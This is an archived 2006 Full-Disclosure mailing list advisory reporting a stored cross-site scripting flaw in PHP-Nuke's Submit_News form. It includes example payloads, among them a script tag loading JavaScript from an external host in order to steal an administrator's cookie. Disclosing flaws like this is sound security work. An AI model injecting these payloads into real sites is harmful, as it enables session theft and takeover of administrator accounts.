[<prev] [next>] [day] [month] [year] [list]
Message-ID: <558f59870603011624w1323414do75bf18b2e2d2107a@mail.gmail.com>
Date: Thu Mar 2 02:25:57 2006
From: zeus.olimpusklan at gmail.com (0o_zeus_o0 security-mx.org)
Subject: PHP-NUKE Submit_News Cross-Site Scripting
Vulnerability
###########################################################################
# Advisory #9 Title: PHP-NUKE Submit_News Cross-Site Scripting Vulnerability
#
#
# Author: 0o_zeus_o0
# Contact: zeus@...sdelared.com
# Website: www.elitemexico.org
# Date: 01/03/2006
# Risk: High
# Vendor Url: http://www.phpnuke-espanol.org/
# Affected Software: php-nuke
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
#================================================================
#vulnerability that affects to all the systems phpnuke in Submit_News, bugs
consists
#
#of inserting code xss in the shipment of the news of users this cause
#
#that when the administrator receives that news robs its cookie, this
#
#would cause identity robbery
#
#
#
#Example XSS:
#================================================================
#
#<script>alert(document.cookie);</script>
#
#<SCRIPT SRC=http://elitemexico.org/xss.js></SCRIPT>
#================================================================
#
#Solution:
#================================================================
#
#VULNERABLE VERSIONS
#================================================================
#all vercion
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.elitemexico.org
#================================================================
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060301/f01cb052/attachment.html
Powered by blists - more mailing lists